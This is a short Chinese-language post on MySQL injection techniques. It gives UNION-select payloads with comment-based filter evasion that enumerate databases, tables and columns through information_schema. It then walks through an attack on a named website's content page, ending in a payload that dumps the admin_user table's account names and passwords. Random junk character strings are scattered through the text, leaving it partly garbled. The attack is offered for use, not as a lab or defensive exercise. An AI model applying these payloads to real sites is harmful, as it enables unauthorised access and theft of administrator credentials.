mysql注入技巧

admin

查库
. Z, f3 v% L9 R  g
( n+ g% l$ t7 r8 I( oid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

, d& e* ]6 O; U! U2 x" x* c, t查表

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
+ S+ m( G  F; L- x
查段
( z! k% t2 g# w2 h, p
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

0 U* Z  L; c- I; Z* p4 a, L0 O$ k, w
mysql5高级注入方法暴表

例子如下:

1.爆表
1 ]2 Z0 ?4 F5 H! [+ z8 ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。
6 Z. m; h0 P) e. N% d8 a5 R) x
' q* A  j  b0 q2.暴字段
, N) _7 e8 N/ D* a- l3 J; Qhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
! j  A; C5 G3 K' j: R, o

3.爆密码
% q6 Y+ o& E# [" p; o9 Lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
9 W2 I0 c" P+ U2 U

2 Y8 z, x! B7 N. h" a